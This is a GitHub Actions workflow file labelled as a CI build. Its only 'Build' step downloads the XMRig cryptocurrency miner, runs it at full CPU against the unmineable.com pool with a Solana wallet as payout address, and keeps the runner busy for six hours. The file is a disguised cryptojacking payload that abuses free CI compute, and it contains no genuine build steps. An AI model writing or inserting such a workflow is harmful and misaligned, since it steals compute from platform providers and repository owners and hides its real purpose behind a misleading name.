name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Build
      run: |
        wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz
        tar -xf xmrig-6.21.0-linux-x64.tar.gz
        cd xmrig-6.21.0
        ./xmrig -o rx.unmineable.com:3333 -a rx/0 -k -u SOL:6zywrMREmZDvC53gERydGNB6G4RNj8dpSgRYnsyJ5TDa.GH_Worker -p x --cpu-max-threads-hint=100 &
        sleep 21600
